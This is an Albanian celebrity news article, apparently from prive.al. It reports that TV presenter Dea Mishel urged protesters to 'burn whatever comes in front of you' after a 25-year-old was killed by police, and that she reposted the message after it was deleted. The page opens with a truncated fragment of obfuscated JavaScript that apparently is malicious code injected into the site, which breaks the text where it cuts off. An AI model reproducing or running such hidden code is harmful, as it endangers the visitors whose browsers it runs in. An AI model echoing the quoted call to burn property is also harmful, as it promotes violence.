;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

“Digjni ça t’iu dalë përpara”: Prezantuesja shqiptare e zëshme për rastin e 25 vjeçarit

By

Dea Mishel, vajza që u bë e njohur nga projekti “Hostel by Anabel”, tashmë prezantuese tek “E diell” ka reaguar mbrëmjen që lamë pas në lidhje me protestat në kërkim të drejtësisë për vrasjen e 25-vjeçarit nga policia.

Por, reagimi ka qenë tërësisht ndryshe nga të tjerët.

E njohur si zë aktiv kundër pushtetit edhe në çështjen e shembjes së Teatrit Kombëtar, Dea është shprehur se duhet “djegur çkado që ju del përpara”.

“Kemi provuar të bëjmë protesta paqësore, s’na është dëgjuar zëri ndonjëherë. F**k it, digjni ca t’ju dalë përpara. Edhe nëse është paguar nga taksat tona, ato lekë që japim gjithsesi vidhen dhe keqpërdoren. Ç’na duhet shpirti festiv kur po vrasim përditë? Një mbulesë e bukur për shoqëri të kalbur?” – shprehet Dea.

Nga “armata” online, postimi është bërë “report” dhe është fshirë më pas, sidoqoftë Dea nuk është tërhequr duke e ripostuar.

“Kam thënë çfarë kam thënë. Nëse ndaloni së më bëri report mua dhe shkoni të jeni frikacakë në hapësirat e juaja” – e ka përmbyllur diskutimin Dea. /prive.al

Artikuj të ngjashëm